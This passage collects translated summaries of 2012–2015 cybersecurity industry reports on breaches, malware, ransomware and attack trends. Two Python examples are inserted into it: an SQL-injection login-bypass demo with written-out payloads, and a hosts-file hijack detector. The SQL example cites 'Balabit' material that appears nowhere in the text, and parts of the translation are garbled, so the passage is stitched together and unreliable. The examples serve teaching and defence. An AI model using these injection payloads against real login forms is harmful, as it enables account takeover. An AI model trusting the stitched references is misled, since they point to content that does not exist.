62% of respondents said the IT security budget should be increased in 2015. The experts advise paying special attention to the following areas when allocating funds:
- next-generation security for endpoints and mobile devices;
- the rapidly evolving cyber threat intelligence services;
- software-defined security solutions.
Positive Technologies: Top Cyber Attack Trends of 2015
On October 15, 2015, representatives of Positive Technologies spoke at the conference "Trends in the development of high-tech crimes - 2015."
Discussing high-tech crime and cyber threats, Vladimir Kropotov, head of the monitoring department at Positive Technologies, and leading analyst Yevgeny Gnedin presented a report titled "Statistics and trends of cyber attacks for the year: a view from the outside, from the inside and from the side." The experts noted the main cybercrime trends of the year:
- attacks increasingly take a roundabout route: for example, attackers hack the partners of the target organization rather than the organization itself;
- social engineering is combined with technical methods more often. Cybercriminals gain access to a partner's mailbox (or learn its email address and register a look-alike domain specifically for the attack) and carry on correspondence with a victim who is unaware of the substitution;
- attacks aimed at a particular person, group of people or specific companies increased. Whereas criminals previously worked mostly by compromising workstations, in 2015 30% of the analyzed attacks targeted corporate resources (mail servers, database servers, internal web services). Investigating targeted attacks, the experts noted advanced techniques such as watering hole attacks, which make detection harder for specialized organizations and allow targeted attacks to be disguised as mass ones.
Internet-connected equipment of all kinds (the "Internet of Things") is also attacked. Criminals exploit the fact that users rarely install updates on such devices, leaving them vulnerable to threats from the Internet. There are many such devices online: routers, smart TVs, temperature sensors, cars. From a single computer, attackers can quickly gain access to hundreds of devices and use them for DDoS attacks or botnets while remaining unnoticed. A peculiarity of these devices is that a reboot or power cut erases all traces of the attack.
Positive Technologies reported the results of its security incident investigations, application source code audits and security monitoring. The study covered 16 systems of large companies and government organizations (Russian and foreign) that underwent external penetration testing in 2014-2015.
The company's statistics show that full control over all systems of the corporate infrastructure could be gained from outside in 44% of cases, and administrator privileges on critical systems (databases, email, management workstations) in 33%. In 58% of the systems, gaining full control over critical resources required only low attacker skill; in 26% the difficulty was medium; and in only 16% the testers could not get inside the corporate network. In most cases (56%), the attackers used existing vulnerabilities in web applications, and in 26% they succeeded by guessing a dictionary password.
"Our study showed that only 20% of the analyzed attacks exploited zero-day vulnerabilities, that is, previously unknown ones. This suggests that in 80% of cases the victims had the opportunity to effectively defend themselves, but they did not take advantage of it, "said Vladimir Kropotov.
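The web-application weakness behind Positive Technologies' 56% figure, and behind Balabit's method 3 above, is easiest to see on a login query. The added Python example below (not the page's or either vendor's code) runs the same credential check in two forms against an in-memory SQLite table of constructed users: the string-concatenated version lets a crafted username comment out the password check, while the parameterised version treats the same input as plain data. Passwords are stored in plaintext here only so the injection is visible; that is not a recommendation.

```python
"""SQL injection on a login check: concatenated query versus placeholders.
Added example with a constructed user table in an in-memory SQLite database."""
import sqlite3


def make_db():
    """Constructed users; plaintext passwords so the bypass is observable."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("admin", "S3cret!pass", 1), ("alice", "correct horse", 0)])
    return con


def login_vulnerable(con, name, password):
    """Builds the statement by concatenation: user input is parsed as SQL."""
    sql = ("SELECT name, is_admin FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return con.execute(sql).fetchone()


def login_hardened(con, name, password):
    """Placeholders: the driver binds the inputs as values, never as SQL text."""
    sql = "SELECT name, is_admin FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone()


# Two classic payloads: close the string and comment out the rest of the WHERE.
INJECTION = "admin' --"           # targets a known account name
BLIND_INJECTION = "' OR 1=1 --"   # matches every row; first row comes back

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, INJECTION, "anything"))   # ('admin', 1)
    print("hardened:  ", login_hardened(con, INJECTION, "anything"))     # None
    print("legit:     ", login_hardened(con, "alice", "correct horse"))  # ('alice', 0)
```

The automated scanners the Balabit text mentions find exactly this pattern by sending `'` and watching for an error or a changed response; the parameterised form gives them nothing to work with, and it costs no more to write than the concatenation.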
Telecoms
Positive Technologies experts note a trend towards more complex telecommunications networks. The rise of Skype, WhatsApp and Google services has cut mobile operators' revenues, and finding new sources of profit has become urgent: companies now offer not only cellular service but also home Internet, IP television and their own applications. All this complicates the network: telephony, Internet and cable television used to run on separate networks, and now they are integrated into one. This tight integration brings information security risks.
Positive Technologies' mobile network security testing has shown that the vulnerabilities of cellular networks built on SS7 allow even a low-skilled attacker to carry out attacks such as disclosing a subscriber's location, denying service to a subscriber, intercepting SMS messages, forging USSD requests and using them to transfer funds, redirecting voice calls, eavesdropping on conversations, and disrupting the availability of a mobile switching center. According to Positive Technologies, most telecom operators are not protected against such attacks. There is a positive trend, however: operators are now interested in monitoring the security of their networks, and the experts predict growing demand from them for security services next year.
84 million new malware samples, 9 million more than in 2014
PandaLabs, Panda Security's antivirus lab, discovered and defused over 84 million new malware samples throughout 2015, up nine million from 2014. This level means that approximately 230,000 new malware samples appeared every day during 2015.
The past year showed the largest number of cyber attacks recorded around the world, in which about 304 million threat samples were used. Consequently, more than a quarter of all samples of malware used were produced in 2015 (27.63%).
The past year has also been difficult for a number of multinational companies that have suffered from large-scale data theft and negative impacts on their IT systems.
The most powerful threats in 2015: Trojans and PPP
In 2015, Trojans, PPPs (potentially unwanted programs, PUPs) and individual Cryptolocker families sowed fear among large companies around the world through massive attacks and theft of thousands of sensitive files.
Trojans continue to be the main source of malware (51.45%), comfortably ahead of other types: viruses (22.79%), worms (13.22%), PNP (10.71%) and spyware ON (1.83%).
In addition to Trojans, Cryptolocker (referred to as ransomware) was the protagonist of cyber attacks throughout the year. According to Corrons, "Cryptolocker is the best choice for cyber criminals, because it is one of the easiest ways to make money. In addition, it proved to be very effective, especially in the case of enterprises that do not think for a long time when paying a ransom for regaining control over stolen information. "
The largest infections are caused by Trojans
Among all the types of malware that led to large infections worldwide, the Trojans showed the highest infection rate (60.30%), but their figure decreased by 5% compared to 2014.
PPPs also had a rather negative impact: about a third of infections used deception techniques to penetrate the PC of their victims. Far behind in this "rating" are such types of threats as adware and spyware ON (5.19%), worms (2.98%) and viruses (2.55%).
China remains one of the most infected countries in the world
The year showed record infection rates. Geographically, China had the highest share of infected computers (57.24%), about 30% higher than in 2014. Taiwan followed with 49.15%, and Turkey came third (42.52%). These three countries have topped this ranking since 2013.
Outside the ten most infected countries, Colombia (33.17%), Uruguay (32.98%) and Spain (32.15%) also showed infection rates above the global average.
Scandinavian countries showed the lowest infection rate
Nine of the ten least infected countries are in Europe; Japan was the only country from another continent.
Scandinavian countries took the top three places: Finland had the lowest infection rate (20.32%), followed by Norway (20.51%) and Sweden (20.88%).
2014
Better to pay than to protect?
Half of the financial institutions in Russia reimburse clients for losses from Internet fraud without conducting any investigation. 31% of companies are willing to consider compensation after an internal investigation of the incident, and 8% require an external investigation. These figures come from a study of commercial companies' attitudes to cyber threats conducted by Kaspersky Lab together with the independent agency B2B International in 2014.
As the study found, many organizations working with online payments are prepared to accept what they see as inevitable monetary risk rather than invest in specialized IT protection: a quarter of companies still believe that the costs caused by cyber threats are lower than the cost of security solutions. Surprisingly, among financial institutions, the ones most directly involved in online money transfers, the share holding this view is even higher, at 33%.
According to data from the Kaspersky Security Network cloud infrastructure, in 2013 almost 4 million users of Kaspersky Lab products encountered an attempt to steal their money using specialized malware (18.6% more than in 2012). This indicates growing cybercriminal interest in electronic payments, and the trend means that the compensation costs companies face will significantly exceed the investment needed to defend against such threats.
"Besides setting aside budget to reimburse stolen funds, financial companies also bear the cost of handling customer complaints. But most importantly, even if a victim's money is promptly returned, he will wonder whether it is worth using the services of a bank that cannot secure his online account. It is better to prevent losses than to compensate for them," comments Alexander Ivanyuk, Senior Manager for Development of Kaspersky Lab Business Solutions for Financial Companies.
Gemalto: Overview of data breaches and thefts
In February 2015 Gemalto published the results of the SafeNet Breach Level Index (BLI): more than 1,500 data breaches in 2014 compromised about one billion data records worldwide. That means the number of breaches rose 49% and the number of records stolen or lost rose 78% compared with 2013.
The Breach Level Index, developed at SafeNet (acquired by Gemalto), is a global database of data breaches that gives security professionals a methodology for assessing the severity of a breach and ranking it among publicly disclosed breaches. The BLI scores the severity of a breach on several parameters based on the information disclosed about it.
According to the BLI database, the main motivation for cybercriminals in 2014 was identity theft: this category accounted for 54% of all breaches and exceeded all others, including access to financial information. Breaches involving personal information also accounted for a third of the most serious breaches, those the BLI rated catastrophic (9.0 to 10 points) or serious (7.0 to 8.9 points). The share of breaches, including perimeter breaches, in which the compromised data was encrypted in whole or in part rose from 1% to 4%.
2014 not only saw a shift towards identity theft; breaches also became more severe, with two-thirds of the 50 most severe breaches by BLI score occurring in 2014. The number of breaches involving more than 100 million compromised records doubled compared with 2013.
By sector, retail and financial services saw the most noticeable changes in 2014. In retail, the number of breaches rose slightly from the previous year, to 11% of all 2014 breaches, but retail's share of compromised records jumped to 55% from 29% a year earlier, driven by attacks on point-of-sale systems. In financial services the number of breaches remained stable year on year, but the average number of records lost per breach increased tenfold, from 112,000 to 1.1 million.
Overall, BLI data shows that personal data remained the main target of attacks in 2014, accounting for 54% of incidents. Most often it is stolen from retailers: hackers who break into a retail chain's IT systems obtain personal data such as:
- payment card data,
- information indicated when issuing a discount or club card,
- data on the place of residence,
- mobile phone number, etc.
Annual information security reviews report that the most common source of data leaks is company employees, whether through malice or negligence. Competing companies steal information as often as hackers do.
Most information leaks in 2014 were recorded in the United States, which the reviews attribute to the particular care with which Americans treat their personal data. For example, in March 2014 an insider at a US healthcare institution was found to have copied patients' personal data. Initially only four patients were thought to be affected, but in the end several thousand patients who had visited the institution during the years the insider worked there were affected.
The Breach Level Index (BLI) maintains a centralized global database of breaches and scores each breach on several parameters, including the type of data and the number of records stolen, the source of the breach and whether the leaked data was encrypted. Each breach receives a score, so the index is a comparative table that distinguishes small and minor incidents from really large and significant ones. The BLI database is built from publicly available information about breaches.
Global Cyber Executive Briefing by Deloitte Touche Tohmatsu Limited
The Deloitte Touche Tohmatsu Limited report Global Cyber Executive Briefing states that almost all organizations will be exposed to cyber attacks, so top managers need to understand the key threats as deeply as possible and identify their most vulnerable assets (as a rule, those that underpin the business).
"Previously, to gain anything, attackers needed physical presence and direct contact with the object of their illegal actions; now everything has become much easier. Today, when technologies develop faster every year, information has acquired extremely high value, ― says Sergey Bukhanov, director of the Risk Management Department at Deloitte CIS. ― The vast majority of the crimes most 'profitable' for attackers today are committed remotely, as the news of recent months eloquently shows: theft of funds from the accounts of hundreds of customers of a popular network of payment terminals; theft of the payment card data of hundreds of thousands of citizens who bought tickets through the website of one of the world's largest transport companies, which forced some banks to block or restrict the cards of several thousand of their customers. We also often learn of bank employees exposed for using excessive privileges to illegally transfer customer funds to personal accounts or to issue a bank guarantee through unauthorized use of the SWIFT system. Given all this, more and more executives around the world are coming to understand the materiality of these threats and are paying increased attention to information security when using information technology. It is also important to note that over the past few years the legislation of the Russian Federation has been improved in areas related to the safe use of information technology and the protection of personal data. New standards of the Central Bank of the Russian Federation for ensuring the information security of banking systems have been published, and stronger liability for high-tech crimes committed in the banking sector in order to steal funds is being discussed."
According to the report, resilience begins with identifying application weaknesses and strengthening the digital infrastructure. Organizations that want to stay vigilant should therefore be prepared to detect an attack as early as possible. Rapid mobilization involves determining early where the threat is heading, what caused the attack and how it will manifest itself. Quick detection can be the signal for the organization to act and thus helps contain and eliminate the threat.
Key findings of the report, including threats to companies by industry:
- High technology: such companies are constant targets of attacks that threaten the largest losses of intellectual property, and they are the most exposed to hacktivism. Compromised high-tech companies are also used as a means of attacking and infecting other companies.
- Online media: such companies are most exposed to cyber attacks aimed at damaging their reputation, and compromised media sites are used as a means of attacking and infecting other companies.
- Telecommunications: these companies face an increased level of technically sophisticated attacks, including from government agencies using targeted, persistent threats to establish covert surveillance for extended periods. Another significant threat specific to the telecommunications sector is attacks on leased customer equipment such as home ISP routers.
- E-commerce: here the predominant attack is the database hack (loss of customer data, including names, physical addresses and phone numbers). Vulnerable areas such as online payment systems are frequently attacked. The most common type of attack is denial of service, used in particular by hacktivists who want to disrupt the organization in the most visible way.
- Insurance: companies in this sector handle large amounts of sensitive data that need to be protected. The frequency of cyber attacks is growing rapidly as insurers move to digital service channels. Attacks are becoming more technically sophisticated, combining advanced malware with other techniques such as social engineering. While current attacks appear to be short-term, the report predicts a possible increase in long-term attacks that are not yet attracting much attention.
- Manufacturing: the sector has seen an increase in attacks by hackers and cybercriminals, as well as corporate espionage. Attacks on manufacturers range from phishing to advanced malware and target not only IT systems but also the related industrial control systems.
- Retail: in this sector, payment card data has effectively become a new currency for hackers and criminals. Threats of insider information leakage are increasing, giving rise to a new type of criminal whose goal is to steal information, especially the valuable cardholder data exchanged between consumers and retailers.
2013
Zurich: 2013 was the most successful year for cyber criminals
740 million confidential records were stolen or illegally viewed by cyber criminals in 2013, the worst figure on record. The data comes from a study prepared by the insurer Zurich Insurance Group together with the Atlantic Council think tank.
The study says that about 2.5 billion people, almost a third of the world's population, regularly use the Internet, with an average of 6 connected devices per person. Every minute 204 million emails are sent, 640 terabytes of data are transmitted and 100,000 tweets are posted.
With this volume of data in circulation, sensitive information is highly exposed, which can cause serious economic shocks. No technology currently exists that can protect individuals and organizations from all cyber risks. If companies cannot mitigate these complex and interconnected risks, the likelihood of a sudden shock comparable in scale to the 2008 collapse of Lehman Brothers in the mortgage market increases.
The study identifies four sources of cyber risk - criminals, hackers, spies and the military.
Criminals usually sell the stolen information; organizations that handle their clients' personal data suffer from them most. Hackers act on a larger scale, disrupting company networks or stealing information that can compromise an organization or a person.
The third traditional cyber threat is espionage, aimed at company research, the latest developments, negotiation strategies and business plans. A prime example is last year's story of Chinese hackers stealing the blueprints for Australia's new intelligence agency building. The fourth group is the military, which specializes in bringing down entire networks and systems, including infrastructure and industrial ones. This, however, happens quite rarely.
Tomorrow the list of risks may be extended by new ones: cloud technologies, driverless cars, medical devices and smart grids. The ever closer connection of the real economy and society to the Internet can lead to widespread upheaval, even more severe than risk managers and Internet professionals are willing to admit. Banks, water supply systems, cars, medical devices and hydroelectric dams can all be attacked.
A way out may be to create alternative networks for use during cyber attacks, and for top management to pay more attention to protecting information. To date, the vast majority of companies do not record cyber attacks, and often do not even know that their confidential data is already in the hands of cyber criminals.
With the current dynamics of cyber threats, cyber risk insurance may soon move from an exotic to a standard insurance option, and the work of risk engineers will come to include monitoring the effectiveness of electronic information systems.
- Threats to finance. In 2013, new malware for attacking online banking systems spread widely worldwide, and ransomware attacks became more and more frequent (recall the notorious CryptoLocker, which encrypts user data and then demands payment for decryption), according to the Trend Micro Incorporated 2013 report on the cyber threat landscape, "Cashing in on Digital Information".
- Mobile threats. Threats to mobile platforms evolved significantly in number and sophistication, as more and more malware originally written for PCs was "reoriented" to mobile platforms. By the end of 2013 the total number of malicious and high-risk Android apps detected reached 1.4 million. Apple users cannot consider themselves 100% protected either: cybercriminals seek to "master" this wide, and therefore attractive, audience of potential victims, and unsurprisingly the number of phishing attacks on Apple platform users increased in 2013.
- Protection of personal information. Social media accounts and cloud storage are becoming increasingly attractive targets for hackers. Aggressive phishing campaigns timed to the launch of iconic platforms such as the PS4 and Xbox One compromised the data of millions of users.
- Attacks on infrastructure. High-profile cyber attacks in South Korea showed that hackers are now capable of organizing large-scale actions against critical infrastructure.
- Unsupported software. One of the key concerns of 2013 was the end of support for some versions of Java and for Windows XP; updates and fixes for the latter stop in April 2014.
Cyber attacks on IT corporations and the media
2013 was remembered for a series of cyber attacks on leading media and IT corporations, mainly in the United States: at various times the New York Times, Wall Street Journal and Washington Post, as well as Twitter, Facebook, Evernote, Apple and Microsoft, were attacked. To one degree or another these attacks led to leaks of personal data of company employees and service users.
Thus, the attack on Adobe Systems compromised tens of millions of customer accounts and leaked source code for such widespread products as Adobe Acrobat, ColdFusion and Photoshop.
Social media under attack
Hackers did not target only IT companies but also ordinary users. In February, ESET experts discovered the PokerAgent malware, which infected players of the Zynga Poker Facebook app. The attackers were after users' personal data and the payment card details linked to their accounts. To collect it, a botnet of several hundred infected devices executed instructions from a command-and-control server. As a result PokerAgent stole the data of more than 16,000 Facebook accounts.
Another notable piece of malware targeting social network regulars was aimed exclusively at Russian users: the Trojan Win32/Bicololo.A was distributed through phishing messages disguised as links to harmless image files. Opening such a link downloaded the malware instead of an image.
Once on the computer, Bicololo modified system files so that when the user tried to open the VKontakte or Odnoklassniki website, or check mail on Mail.ru, he entered his credentials on a fake page belonging to the attackers.
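The redirection described above is the classic hosts-file hijack: the hostname stays the same in the browser while name resolution is pointed at an attacker-controlled address. The check below is an added example, not ESET's code or anything from the original page. It assumes (the page only says "system files") that the override lives in the hosts file, uses a watch list of the domains the page names plus ok.ru, and runs over a constructed sample hosts file rather than the live system file. It flags any watched domain, or subdomain of one, that is mapped to an address other than loopback or 0.0.0.0 (benign "block this host" entries), and with `watched=None` it flags every hostname mapped to a real address, which catches hijacks of domains not on the list.

```python
"""Detect hosts-file entries that hijack well-known login hostnames.

Added example: parses hosts-file text and flags entries that point a
watched domain (or a subdomain of it) at an address that is neither
loopback nor unspecified, i.e. not a benign ad-blocking entry.
"""
import ipaddress
from typing import Iterable, List, Optional, Tuple

# Constructed sample, not taken from a real infection; the 203.0.113.0/24
# block is reserved for documentation and stands in for an attacker host.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# entries of the kind a Bicololo-style Trojan would append (constructed)
203.0.113.45    vk.com www.vk.com
203.0.113.45    odnoklassniki.ru ok.ru
203.0.113.45    mail.ru e.mail.ru
0.0.0.0         ads.example.net   # harmless ad-blocking entry
not-an-address  garbage.example   # malformed line, ignored
"""

# Assumed watch list: the sites named on the page, plus ok.ru.
WATCHED_DOMAINS: Tuple[str, ...] = ("vk.com", "vkontakte.ru", "odnoklassniki.ru", "ok.ru", "mail.ru")


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs, one per hostname on each line.

    Comments and blank lines are skipped; lines whose first field is not a
    valid IPv4/IPv6 address are ignored rather than raising.
    """
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        addr, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue
        for name in names:
            pairs.append((addr, name.lower().rstrip(".")))
    return pairs


def is_blocking_address(addr: str) -> bool:
    """True for 127.0.0.1, ::1, 0.0.0.0 and ::, the addresses used to sinkhole a host."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_unspecified


def matches_watched(host: str, watched: Iterable[str]) -> bool:
    """Exact match or subdomain match (www.vk.com matches vk.com)."""
    return any(host == d or host.endswith("." + d) for d in watched)


def suspicious_entries(text: str, watched: Optional[Iterable[str]] = WATCHED_DOMAINS) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs that redirect a hostname to a real address.

    With watched=None every non-localhost hostname mapped to a non-blocking
    address is reported; otherwise only watched domains and their subdomains.
    """
    watched_list = list(watched) if watched is not None else None
    findings: List[Tuple[str, str]] = []
    for addr, host in parse_hosts(text):
        if is_blocking_address(addr):
            continue  # sinkhole entries are the normal, benign use of the file
        if host == "localhost":
            continue
        if watched_list is None or matches_watched(host, watched_list):
            findings.append((addr, host))
    return findings


if __name__ == "__main__":
    for addr, host in suspicious_entries(SAMPLE_HOSTS):
        print(f"hijacked: {host} -> {addr}")
```

To run it against a real machine, read `/etc/hosts` or `%SystemRoot%\System32\drivers\etc\hosts` into `suspicious_entries`; a hit for a domain you have not deliberately overridden is a strong indicator of this class of credential-phishing Trojan.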
Phishing attacks on instant messengers
In 2013 not only social network users came under attack but also instant messenger users. A large-scale spam campaign discovered by ESET experts in Skype, Gtalk, QIP and a number of other instant messengers endangered more than half a million users worldwide, including 40,000 in Russia. Using phishing messages, the criminals infected systems with malware and gained access to the victims' personal and authentication data.
Another major attack spread spyware among Polish users. Analysts at ESET's virus laboratory in Krakow recorded an attack on users of Skype, MSN Messenger, Jabber, GTalk, ICQ and other messengers. The Spy.Agent malware collected information about visited sites, installed applications and Wi-Fi passwords, logged keystrokes and even recorded calls.
Capture of cybercriminals
The cybercriminals' actions did not go unanswered: thanks to Microsoft, the Citadel botnet was taken down in 2013. With the support of law enforcement agencies, providers and special services, the corporation carried out an operation to disrupt one of the world's largest botnets, whose damage by then exceeded half a billion dollars.
Ross Ulbricht, founder of the Silk Road site for selling illegal drugs, was also arrested in the United States. On the other side of the world, in Russia, Ulbricht's "colleague", a hacker known as Paunch, was detained. He became known as the owner of the infamous Blackhole exploit kit, which cybercriminals around the world actively used to covertly compromise user systems.
Threats to Tor
Cybercriminals picked up the trend for anonymity in the middle of the year, when ESET experts discovered Atrax, technically the most complex and interesting botnet built for the anonymous Tor network. Since data transfer over Tor is slow, the botnet was not used to steal large volumes of data. Instead it collected information entered into login forms on various sites and downloaded additional malicious files to the PC. Atrax reaches a PC through a malicious page disguised as the PayPal customer service site.
Finding and taking down this botnet's command center is not easy, since here Tor's anonymity protects not users but the cybercriminals themselves. As migration to the "hidden Internet" grows, we can expect new, technologically even more advanced Tor-based threats.
Mobile threats
Another, still relatively exotic, kind of botnet is the mobile botnet. First recorded in 2012, mobile botnets are now common: most Android malware contains functionality to combine infected smartphones and tablets into botnets.
In mobile threats generally, compared with the same period of the previous year, the number of new families of Android malware (Android still accounts for up to 99% of all mobile threats) grew by 43.6% in 2013, and this reflects not only increased activity of known threats but the emergence of new categories of software:
- Downloader: tries to download other malware from the Internet and install it on the device.
- Dropper: installs other threats on the device when launched; the threats are contained in the dropper's own body.
- Clicker: generates traffic to sites by artificially inflating click counts.
- Banking malware: specializes in stealing sensitive user information used for online banking transactions.
One of the most active mobile threats was the SMS Trojan detected by ESET products as TrojanSMS.Agent (its variants are especially active in Russia and the former USSR). 31 variants of this program were discovered in 2011 and 324 in 2013. Such Trojans covertly send messages to premium-rate numbers, draining the user's mobile account.
In 2013, the total number of malware for the Android platform increased by 63%. Iran, China and Russia demonstrated the highest growth rates of Android threats.
Similar growth will continue in 2014; new mobile threats will show not only quantitative but qualitative growth, in particular by increasingly exploiting vulnerabilities in mobile platforms and their components.
Ransomware
Ransomware activity also grew significantly in 2013: ESET experts recorded in Russia a rapid rise in the FileCoder Trojan, which demands a ransom to decrypt the user's personal files. Compared with the average level in the first half of 2013, FileCoder activity rose by more than 200%, and according to ESET, Russian users accounted for more than 44% of detections.
Another ransomware common in 2013, CryptoLocker, used a countdown as psychological pressure: an infected user was given only 70 hours to pay the ransom and regain access to the encrypted data; otherwise the data was lost forever.
The Nymaim Trojan discovered by ESET experts can also lock a user's computer for ransom. It was previously distributed via the BlackHole exploit kit mentioned above, but the cybercriminals later switched to distribution via Google search: clicking a malicious link in the search results, the user downloaded a malicious archive instead of the information he was looking for.
No decrease in ransomware activity should be expected in 2014; in particular, the rise of the Bitcoin virtual currency will spur new variants. Thanks to its anonymity and high exchange rate, cybercriminals will increasingly demand ransom in bitcoins. Some, however, have chosen not to extort bitcoins but to steal them directly: a new variant of the well-known banking Trojan Hesperbot, widespread in Europe, now targets electronic currency by gaining access to the wallet that holds the private keys.
2012
WatchGuard: Cloud service providers to be hit by massive network attacks
2012 will be a difficult and at the same time technologically interesting year for information security. Below is WatchGuard's forecast of network and information security threats for 2012[48].
In 2012 a large wave of organized network attacks on cloud services and hacks of major cloud providers are expected; at the same time, protection of cloud providers' network assets will reach a new level.
Why are clouds such attractive targets?
- Many customers store sensitive data in the cloud, where attackers can get at it.
- Cloud services are built on complex technologies that can have serious vulnerabilities.
- Most cloud providers use sophisticated, bespoke Web applications and virtualization technologies which, if misconfigured, pose a significant threat to data security in the cloud.
Attackers will use new technologies and malicious APT software to organize attacks on corporate networks
In 2012, Advanced Persistent Threats (APTs), complex and detection-resistant malware, will develop actively.
In 2011, governments, industrial control systems and large global companies suffered from APTs; such attacks were behind the RSA SecurID breach and Operation Shady RAT. There is also a successor to the Stuxnet worm, the Duqu worm.
It is expected that this year APT malware will be improved and APT threats will be aimed not only at the corporate sector, but also at ordinary users.
Major sensitive data leaks expected
Because of complex APT malware, new malware authors and professional hacker groups such as Anonymous and LulzSec, 2011 saw significantly more incidents involving large network attacks than previous years.
It is hard to say what contributed most to this rise: attackers may have become more organized, many professional hacker groups have appeared, and new regulations require companies to report all attacks and data breaches. In any case, the upward trend in leaks is expected to continue in 2012.
Increased demand for virtual security solutions
In 2012, interest in virtualization systems security solutions will increase significantly among small and medium-sized companies.
Until recently, many IT professionals in small and medium-sized businesses did not fully realize how serious the risk of data loss could be if virtual environments were not implemented properly.
Now the situation will change: in the new year, the demand will grow not only for virtualization technologies, but also for information security tools for virtual environments.
Online mobile app stores for smartphones and communicators will "help" the rapid spread of mobile malware
Attackers will continue to focus on mobile devices, or rather on online mobile app stores. To avoid mobile malware, be careful when downloading apps from online stores and always take into account the reputation of the app's seller and developer.
BYOD issue will lead to more data breaches
Employees' use of personal mobile devices in company work networks (Bring Your Own Device, BYOD) can lead to serious data breaches.
Specialists who advocate letting employees use their own devices on the corporate network say BYOD will substantially reduce IT costs, increase productivity, reduce the load on technical support and simply make work more convenient for staff.
But besides these obvious benefits, BYOD brings the risk of leakage of important information and problems with centralized control of these devices.
Facebook will remain the main target for attackers (network attacks, social engineering, malware)
In 2011, Facebook became the largest source of malicious links, overtaking in popularity such a threat as malicious email attachments.
In 2012, attacks on both individual Facebook users and the network as a whole will increase significantly. Accordingly, many Facebook security updates and new protective solutions are expected this year.
Attackers will organize attacks on the physical equipment of network infrastructures
There will be at least one major network attack this year aimed at disrupting the physical hardware of a network infrastructure.
The possibility of such attacks, for example on power systems, has long been known in theory, but no one had heard of one being carried out until the Stuxnet worm. This worm can infect SCADA systems and make changes that directly affect the operation of physical equipment.
SCADA systems are now a primary research target for both attackers and security specialists, since modern malware has very broad functionality and can effectively infect industrial control systems.
Attackers will integrate geolocation into malware to target attacks more precisely
Geolocation is a major topic among security specialists, since such functionality potentially violates a person's right to privacy: the information can be used to track people and their habits.
In 2012 there will be a great deal of malware with geolocation capabilities, making attacks more targeted. Simple geolocation is already used in malware to pick targets by the user's location and choose the most effective attack method for each region. Attackers are expected to use geolocation actively this year to increase the impact of network attacks.
HTML5 will give attackers many opportunities to hack websites
The Internet has been a battleground between hackers and users for years. In 2011 most network attacks targeted Web applications, enabling attackers to steal terabytes of data.
Dynamic Web technologies such as Web 2.0 and HTML5 are one of the main factors in the growth of attacks on Web applications. They are extremely powerful and undoubtedly useful, but they also bring security weaknesses, and they are used by almost all major websites and the largest cloud providers. If developers misuse these technologies and neglect secure coding practices, attackers gain many opportunities to hack Web applications and bypass corporate network protection. In 2012 the number of network attacks on Web applications will increase tenfold.
Symantec: Cyber conflict will become the norm
The corporation Symantec published in December 2012 a forecast of trends in the world for cyber security 2013. According to the corporation's experts, in 2013 attacks will become more aggressive and will be carried out not only for the purpose of earning money or espionage, but also for the purpose of demonstrating the strength of the attackers. In addition, the number of threats to users of mobile and cloud technologies, as well as to the audience of social networks, will increase.
Cyber conflict will become the norm
Starting in 2013, conflicts between states, organizations and individuals will largely move into cyberspace. Online espionage is highly successful and extremely hard to prove. Governments, like various organized groups of individuals, will continue to use cyberattacks to damage or destroy sensitive information or the financial resources of their adversaries. In 2013, we will witness virtual "saber-rattling," where governments, organisations or even groups of individuals use cyber-attacks to show off their power or make themselves known.
Symantec experts also expect an increase in the number of targeted attacks aimed at an individual or non-governmental organization that advocates, for example, certain political views or is a member of a minority in a particular conflict. Recently, we have encountered this kind of attack in situations where the behavior of individuals or organizations becomes the subject of discontent of a particular group of "hacktivists."
Ransomware Is Replacing False Antivirus
While fake antivirus programs are slowly fading away, even tougher types of threats are emerging in cyberspace. All over the world, so-called ransomware (from the English word ransom), already quite popular in Russia, is gaining popularity.
Although such a "business model" had been used before, it suffered from the same shortcoming as real kidnapping: there was no convenient way to collect the money. Thanks to the development of online payment systems, attackers have solved this problem.
Blockers will go beyond simple extortion and will aim at intimidation, that is, cyber-bullying (a cyber-attack intended to cause psychological harm). Next year, criminals will reach a new level, playing on the emotions of victims and using methods after which it becomes much harder to restore the system.
Mobile advertising will complicate the situation
Mobile advertising software (madware) is a nuisance that not only greatly interferes with the use of the device, but can also give attackers details of your location, contact information and device identification information. A madware program that silently lands on the device when a third-party application is installed often begins to flood the user with pop-ups, creates shortcuts, changes browser settings and collects personal data. In the last nine months alone, the number of applications that include the most aggressive types of madware has increased by 210%. Data on the location and characteristics of the device can be legally acquired by Internet ad aggregators to serve more relevant ads. Symantec experts expect to see an increase in the use of this type of program, driven by companies' desire to increase revenue through mobile advertising. This also includes a more aggressive and potentially malicious method of monetizing "free" mobile applications.
Monetization of social networks will create new dangers
Information security experts note that users place great trust in social networks, from sharing personal data to buying in-game currency and virtual gifts for friends. As social networks let users give each other real gifts in order to increase monetization, the growth of money turnover on social networks gives attackers new opportunities for attacks.
Symantec experts expect an increase in the number of attacks aimed at stealing payment data on social networks and at deceiving users into disclosing this and other data to fake social networks. This could include fake gift notifications and emails requiring the user to provide a home address and other personal information. Although providing non-financial information may seem harmless, attackers trade and exchange it, combining it with data they already have, which often gives them access to truly valuable information.
Attackers will follow users to mobile and cloud technologies
Attackers will go where users are, and at the moment these are cloud and mobile technologies. It is cloud and mobile platforms that will become the target of attackers in 2013. The rapid increase in the number of malware for Android OS in 2012 reinforces this forecast.
In addition, connecting unsecured devices to corporate networks, where they collect information that then ends up in other cloud storage, significantly increases the risk of leakage or targeted data capture. As users install more and more applications, infection ultimately becomes inevitable.
